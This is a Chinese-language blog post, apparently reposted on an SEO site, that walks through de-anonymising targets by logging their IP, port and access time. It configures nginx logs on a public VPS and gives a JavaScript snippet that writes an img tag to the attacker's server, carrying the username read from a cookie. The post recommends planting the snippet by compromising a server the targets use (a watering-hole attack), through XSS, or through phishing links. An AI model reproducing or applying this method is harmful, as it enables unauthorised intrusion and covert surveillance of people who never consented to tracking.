抓ip+端口落地身份的方案

小初seo 2021年5月17日00:00:53运营技巧2663 次浏览1531字阅读5分6秒
0x00 前言
做GA的业务,有时客户会要求去抓取目标人员使用的【ip地址+端口+时间】,以便后续落地目标的人员身份。
刚开始接到需求时我首先想到的是去目标服务器上监听抓取通信流量,不过后面在老大指点下我们换了一套更好的方案:
(1)不需要获取目标服务器权限
(2)不需要写逻辑代码
(3)多个项目同时使用一个环境时能够筛选结果
本文就介绍一下这套方案。
0x01 原理和前提条件
(1)具体原理:
nginx日志经过配置后可以记录请求者的访问ip、端口和请求时间。
(2)前提条件:
1、需要准备一台公网vps。
2、需要有办法能让目标主动请求你vps上的图片(img标签可以避免跨域问题)。
关于条件2其实有很多方法,我们利用了水坑攻击的思路,拿下了目标会使用的后台服务器然后修改前端源码让访问者主动请求我们vps上的图片资源。
如果没有服务器权限的话,挂xss或者向目标发钓鱼链接也是可以的。如果是那种允许发表外链图片内容的网站就更简单了。
0x02 搭建部署vps
(1)首先在公网vps上搭建nginx服务器,我这里直接开了一台阿里云的宝塔镜像,简单快捷,后续绑定证书也很方便。
抓ip+端口落地身份的方案
(2)在安全组开放80、443和8888端口,然后登陆服务器输入命令bt获取登陆入口、初始账密等信息。
抓ip+端口落地身份的方案
(3)登陆宝塔后台后在软件商店安装nginx
抓ip+端口落地身份的方案
(4)点击设置-配置修改,在http大方块中添加下面的代码修改nginx的记录日志的格式(默认不会记录端口所以需要修改配置)
log_format  main  '$remote_addr - $remote_port - [$time_local] "$request" "$http_user_agent"';

抓ip+端口落地身份的方案
(5)新建一个网站,如果目标系统是https,则需要解析一个域名(https无法向http链接发出请求),如果不是https,那解析一个ip就好了。
抓ip+端口落地身份的方案
(6)创建之后点击SSL证书下面的未部署去添加证书。注意域名需要真实的解析到这个ip,证书校验才会成功。可以自己申请购买一个域名或者使用域前置。
抓ip+端口落地身份的方案
(7)部署成功后,可以用 https://ip地址 访问网站,国内解析域名需要备案,所以用ip地址访问就好了。
抓ip+端口落地身份的方案
(8)网站-设置-配置文件的最下面,access_log最后面加上main,让其使用nginx配置文件中我们刚刚添加的日志配置。
抓ip+端口落地身份的方案
(9)在软件商店-nginx里重启nginx
抓ip+端口落地身份的方案
(10)登陆vps,在/www/wwwlogs目录下查看日志,可以看到已经能记录ip、端口和时间了。
抓ip+端口落地身份的方案
0x03 部署探针
1、首先观察目标前端源码,看看用户名是怎么获取的(这步用于区分具体是后台的哪个用户的身份,可省略),下图的例子,用户名是$cookie.name
抓ip+端口落地身份的方案
2、插入以下js代码
var username = '$cookie.name ';document.write("<img src='https://你的vps的ip地址/?flag@"+username+"'>");

如果没有获取到目标的源码不知道用户名变量是什么,就直接插img标签同时省略username的部分。
3、目标访问后,就可以在日志里去收获成果了——某用户在某时使用某ip的某端口。
抓ip+端口落地身份的方案
4、添加flag部分是为了便于筛选日志,公网vps时时刻刻都可能会被各种扫描器扫描,从而产生大量干扰。添加flag标志后,使用cat和grep组合即可排除这些干扰。
抓ip+端口落地身份的方案
5、同时不同项目的探针也可以使用不同的flag字符串进行区分,这样就不用开很多台vps了。
抓ip+端口落地身份的方案
0x04 一个坑
宝塔的nginx日志人工改动后(比如用vim或者sed),可能会导致不再记录日志,需要重启nginx才能恢复。所以配置好vps后注意不要对日志进行人工改动。

小初seo
  • 本文由 发表于 2021年5月17日00:00:53
  • 转载请务必保留本文链接:https://www.pkak.cn/youhua/3993.html
运营技巧

有ipad后,如何平衡无纸化和纸质笔记?

大家好,后台呢,经常有小粉丝问我,有了ipad之后,他总是纠结无纸化笔记和纸质笔记,到底什么时候用纸质笔记,什么时候用无纸化笔记呢? 今天就分享一下我的经验和用法。我这个ipad呢,用了有两年了,里面...
运营技巧

短视频配音素材网站(短视频剪辑必备配音网站)

现在的短视频做的是越来越精美,视频的视频拍摄十分清晰,视频内容风趣幽默,视频剪辑的效果很炫酷等等 但是你会发现他们的场景音乐会十分的契合视频内容,会给人留下很深刻的印象,当你听到那首配乐时,会不自觉地...
运营技巧

关键词引流高级玩法(获取精准可观流量)

因为我个人是做专业人设IP,又木有钱投放,所以就用关键词来获取流量,而这套关键词获取流量的方法,只要在有搜索框的地方皆可使用。 主要分为 一、为什么要用关键词 二、什么是关键词 三、怎么查询关键词 四...
运营技巧

一元盲盒脱单怎么玩(高阶玩法整合)

前一段时间抖音上火了一个街头一元盲盒脱单的视频,紧接着就是一大批的模仿者,内容就是支付一块钱可以留下你的联系方式或者购买一个联系方式。 盲盒脱单线上和线下的一样,不过是处于互联网,涉及范围更大,传播更...
运营技巧

私域流量怎么建立?一个模型教会你(一)

今天,和大家分享一个比较通用的私域流量模型,可以最低成本的帮助你尝试构建自己的用户池,实现流量的自给自足; 去年疫情伊始,很多线下门店受到客流量直接清零的冲击,尤其是餐饮、娱乐、商城、亲子等服务型企业...
运营技巧

用户投稿对于网站排名是否真的有增益(详细解答)

我们知道对于现阶段的网站运营而言,内容变得格外重要,内容是王道,我想这是一个不争的事实,但在实际操作中,我们每个网站的内容输出都是有限的。 有的时候就会引入第三方用户的投稿,在某种程度上,这缓解了我们...
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:2   其中:访客  2   博主  0
    • 挂胶滤布
      挂胶滤布 0

      不错

      • Ct13002523882
        Ct13002523882 1